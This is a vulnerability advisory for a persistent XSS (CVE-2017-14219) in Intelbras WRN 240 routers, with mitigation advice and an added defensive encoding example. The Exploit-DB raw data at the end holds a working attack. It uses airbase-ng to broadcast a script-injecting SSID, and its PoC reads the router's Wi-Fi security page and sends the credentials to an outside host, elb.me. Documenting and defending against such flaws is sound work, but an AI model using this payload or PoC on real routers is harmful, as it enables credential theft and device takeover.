Vendor: Intelbras Wireless N 150Mbps
By: Elber Tavares
CVSS: 6.1 (MEDIUM)
CWE: 79 (XSS)
Product Name: Intelbras Wireless N 150Mbps
Affected Version From: Intelbras Wireless N 150Mbps - WRN 240
Affected Version To: Not specified
Patch Exists: NO
Related CVE: CVE-2017-14219
CPE: h:intelbras:intelbras_wireless_n_150mbps:wrn_240
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux, Windows 7, 8.1, 10
2017

XSS persistent on intelbras router with firmware WRN 250

This exploit allows for persistent XSS on Intelbras routers with firmware WRN 250. The malicious script is injected through the page http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm, using the payload </script><script src='//elb.me'>. The exploit requires a PHP script on the host referenced by the payload to retrieve the logs.

Mitigation:

To mitigate this vulnerability, update the firmware of the Intelbras router to a version that includes a fix for this issue (no patch is listed above). Additionally, network administrators can implement input validation and context-aware output encoding of the values rendered in the router's web interface to prevent XSS attacks.
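The payload in this advisory is broadcast as a Wi-Fi network name (see the airbase-ng line in the raw data) and ends up in the router's site-survey page, where "</script>" is enough to break out of a script block. The following is an added example, not the advisory's code and not the Intelbras firmware: a hypothetical stand-in for such a page that shows the raw concatenation pattern beside its hardened form, with the encoder chosen per output context (HTML text vs. a string literal inside an inline script), plus a check a defender can use in UI tests and a triage filter for survey results. The rendering functions, the SSID list and the "elb.me" host are taken from or constructed around the advisory; nothing else is assumed about the real firmware.

```javascript
// Added example (not from the advisory or from Intelbras): context-aware
// encoding of an untrusted SSID before it is written into an admin page.
// renderRowUnsafe / renderRowSafe are hypothetical stand-ins for the
// router's real site-survey rendering.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// HTML text / quoted-attribute context.
function encodeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// JS string-literal context inside an inline <script>. JSON.stringify escapes
// quotes and backslashes; '<' and '>' are additionally turned into \u escapes
// so the literal can never contain "</script" and the HTML parser cannot
// terminate the script block early. U+2028/2029 are JavaScript line
// terminators and are escaped for the same reason.
function encodeJsString(untrusted) {
  return JSON.stringify(String(untrusted))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Vulnerable pattern (what the advisory abuses): the SSID is concatenated raw
// into markup and into a script block.
function renderRowUnsafe(ssid) {
  return `<tr><td>${ssid}</td></tr>\n<script>var lastSsid = "${ssid}";</script>`;
}

// Hardened pattern: each sink gets the encoder for its own context.
function renderRowSafe(ssid) {
  return `<tr><td>${encodeHtml(ssid)}</td></tr>\n<script>var lastSsid = ${encodeJsString(ssid)};</script>`;
}

// UI-test check for script-block breakout: exactly the one script block the
// template wrote may open and close. (It does not catch quote breakage inside
// the literal; encodeJsString is what prevents that.)
function hasSingleScriptBlock(html) {
  const lower = html.toLowerCase();
  const opens = lower.split("<script").length - 1;
  const closes = lower.split("</script").length - 1;
  return opens === 1 && closes === 1;
}

// Defender-side triage over a site survey: network names carrying angle
// brackets or a javascript: scheme have no legitimate reason to exist.
function flagSuspiciousSsids(ssids) {
  return ssids.filter((s) => /[<>]/.test(s) || /javascript:/i.test(s));
}

// Constructed sample survey, including the advisory's payload string.
const SAMPLE_SSIDS = [
  "HomeNetwork",
  "</script><script src='//elb.me'>",
  'Cafe "Guest" 5G',
];

for (const ssid of SAMPLE_SSIDS) {
  const unsafeOk = hasSingleScriptBlock(renderRowUnsafe(ssid));
  const safeOk = hasSingleScriptBlock(renderRowSafe(ssid));
  console.log(`raw render intact: ${unsafeOk}  encoded render intact: ${safeOk}  ssid: ${ssid}`);
}
console.log("flagged for review:", flagSuspiciousSsids(SAMPLE_SSIDS));
```

The JSON-based encoder stays lossless: the browser decodes the \u escapes back to the original SSID, so the page still shows the real network name while the markup can no longer be altered by it.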
Source

Exploit-DB raw data:

# Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10

# CVE-2017-14219

For more info:

http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html

URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm

Payload: </script><script src='//elb.me'>

"elb.me contains the malicious code on index"

airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon

// requires a PHP script to collect the logs

PoC:

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
       alert(rawFile.responseText);
       var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
       // selects the part of the page that holds the credentials
       new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
       // sends the credentials, base64-encoded
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
// fetches the source of the /userRpm/WlanSecurityRpm.htm page
rawFile.send();